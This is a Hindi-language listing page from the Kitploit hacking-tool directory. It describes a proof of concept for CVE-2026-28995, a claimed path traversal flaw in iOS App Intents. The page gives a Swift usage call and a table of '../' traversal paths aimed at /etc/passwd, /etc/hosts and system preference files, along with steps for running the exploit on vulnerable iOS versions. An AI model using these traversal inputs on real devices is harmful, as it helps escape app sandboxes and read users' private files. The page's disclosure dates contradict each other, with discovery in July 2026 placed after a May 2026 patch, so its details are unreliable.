Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-28995 — # CVE-2026-28995 CVE-2026-28995 के लिए प्रूफ ऑफ कॉन्सेप्ट — iOS 26.4.2 और उससे नीचे के App Intents में पाथ ट्रैवर्सल भेद्यता। | Kitploit
उपकरण/GitHubGitHub/robertmak2014-sudow/cve-2026-28995
आईओएस सुरक्षाभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगमोबाइल सुरक्षा
GitHubrobertmak2014-sudow/cve-2026-28995

CVE-2026-28995

# CVE-2026-28995 CVE-2026-28995 के लिए प्रूफ ऑफ कॉन्सेप्ट — iOS 26.4.2 और उससे नीचे के App Intents में पाथ ट्रैवर्सल भेद्यता।

रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
42148 दिन पहलेअभी तक समीक्षित नहीं
साझा करें

CVE-2026-28995

CVE-2026-28995 के लिए प्रूफ ऑफ कॉन्सेप्ट — iOS 26.4.2 और उससे नीचे के App Intents में पथ ट्रैवर्सल भेद्यता।

विवरण

यह भेद्यता एक दुर्भावनापूर्ण ऐप को App Intents के माध्यम से अपने सैंडबॉक्स के बाहर किसी भी फ़ाइल को पढ़ने की अनुमति देती है। इसका मूल कारण Apple के App Intents फ्रेमवर्क में अपर्याप्त पथ सत्यापन है।

प्रभावित संस्करण: iOS 26.4.2 और उससे नीचे
पैच किया गया: iOS 26.5 (11 मई, 2026)

उपयोग

1. फ़ंक्शन readCve(path: String) -> String

let intent = CVE_2026_28995()
let content = intent.readCve(path: "../../../../../../../../../../../../../etc/passwd")
print(content)

2. पथ उदाहरण

पथपढ़ता है
../../../../../../../../../../../../../etc/passwdउपयोगकर्ता पासवर्ड
../../../../../../../../../../../../../etc/hostsहोस्ट फ़ाइल
../../../../../../../../../../../../../var/mobile/Library/Preferences/.GlobalPreferences.plistसिस्टम प्राथमिकताएँ

3. निर्देशिका संभालना

यदि पथ किसी निर्देशिका की ओर इशारा करता है, तो फ़ंक्शन लौटाता है:

[DIRECTORY]
Contents:
file1.txt
file2.jpg
folder/

कैसे चलाएँ

  1. Xcode में एक iOS प्रोजेक्ट बनाएँ।
  2. प्रोजेक्ट में CVE-2026-28995.swift जोड़ें।
  3. लक्ष्य पथ के साथ readCve(path:) को कॉल करें।
  4. iOS 26.4.2 या उससे पहले के संस्करण पर चलाएँ।

जिम्मेदार प्रकटीकरण

खोजा गया: 1 जुलाई, 2026
पैच किया गया: iOS 26.5 (11 मई, 2026)

टूल डाउनलोड करें